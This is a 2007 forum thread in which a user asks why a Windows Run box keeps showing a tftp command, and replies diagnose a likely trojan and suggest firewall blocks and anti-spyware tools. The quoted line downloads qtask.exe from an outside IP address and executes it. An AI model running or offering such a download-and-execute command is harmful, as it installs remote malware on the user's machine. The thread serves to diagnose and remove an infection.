Run command showing a tftp command on it's own

Discussion in 'Computer Support' started by kvine@marchnetworks.com, Jan 12, 2007.

  1. Guest

    Hi

    About 5 times yesterday this would show up in my Run command while it
    was working. I have no idea why and doing a virus and adaware scan
    does not fix it. I do not have Quicken installed on my PC.

    tftp -i 216.104.106.132 get qtask.exe& start qtask.exe& exit

    I just want to get rid of it so what else can I try?

    Thanks
    Ken
     
    , Jan 12, 2007
    #1
    1. Advertisements

  2. wrote:

    > About 5 times yesterday this would show up in my Run command while it
    > was working. I have no idea why and doing a virus and adaware scan
    > does not fix it. I do not have Quicken installed on my PC.
    >
    > tftp -i 216.104.106.132 get qtask.exe& start qtask.exe& exit
    >
    > I just want to get rid of it so what else can I try?


    Maybe you are infected with this:
    http://www.sophos.com/security/analyses/w32rbotaku.html
    ...which says it uses the filename qtask.exe

    Or maybe you have some other trojan that is trying to download it.
    Try the first three (free) anti-spyware programs listed here:
    http://k75s.home.att.net/tips.html#spyware

    --
    -bts
    -Motorcycles defy gravity; cars just suck
     
    Beauregard T. Shagnasty, Jan 12, 2007
    #2
    1. Advertisements

  3. why? Guest

    On 12 Jan 2007 05:34:19 -0800, wrote:

    >Hi
    >
    >About 5 times yesterday this would show up in my Run command while it
    >was working. I have no idea why and doing a virus and adaware scan
    >does not fix it. I do not have Quicken installed on my PC.


    So then tell your firewall to

    a) block tftp.exe or .com as an app
    b) block the IP address
    c) block the (default) port
    http://www.iana.org/assignments/port-numbers
    tftp 69/tcp Trivial File Transfer
    tftp 69/udp Trivial File Transfer

    >tftp -i 216.104.106.132 get qtask.exe& start qtask.exe& exit


    Output from ARIN WHOIS
    ARIN Home Page ARIN Site Map ARIN WHOIS Help Tutorial on Querying
    ARIN's WHOIS
    Search for :
    Search results for: 216.104.106.132

    OrgName: Cyber Beach Communications
    OrgID: CBCH
    Address: 500 Barrydowne Rd
    City: Sudbury
    StateProv: ON
    PostalCode: P3A-5W1
    Country: CA

    Ask them?

    >I just want to get rid of it so what else can I try?


    d) rename tftp.exe / .com
    e) delete it (c)

    >Thanks
    >Ken


    Fairly simple.

    Me
     
    why?, Jan 12, 2007
    #3
    1. Advertisements

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments (here). After that, you can post your question and our members will help you out.